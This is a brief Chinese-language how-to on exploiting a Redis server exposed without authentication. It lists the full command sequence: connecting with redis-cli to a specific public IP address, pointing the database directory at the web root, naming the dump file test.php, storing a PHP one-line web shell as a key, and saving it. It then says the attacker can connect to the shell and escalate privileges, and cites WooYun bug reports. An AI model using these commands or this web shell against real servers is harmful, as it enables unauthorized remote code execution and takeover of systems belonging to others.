如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:
开启redis客户端
输入以下命令来连接远程redis
redis-cli -h 125.39.185.150 -p 6379
接下来,在远程redis内存中设置数据:
config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)
config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)
set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)
save (将Memory中的key-value保存到硬盘,并保存为test.php文件)
四个OK就搞定了~
此时,就可以直接连shell,开始提权了~
redis入侵参考:
http://www.wooyun.org/bugs/wooyun-2015-0101465
http://www.wooyun.org/bugs/wooyun-2010-0105096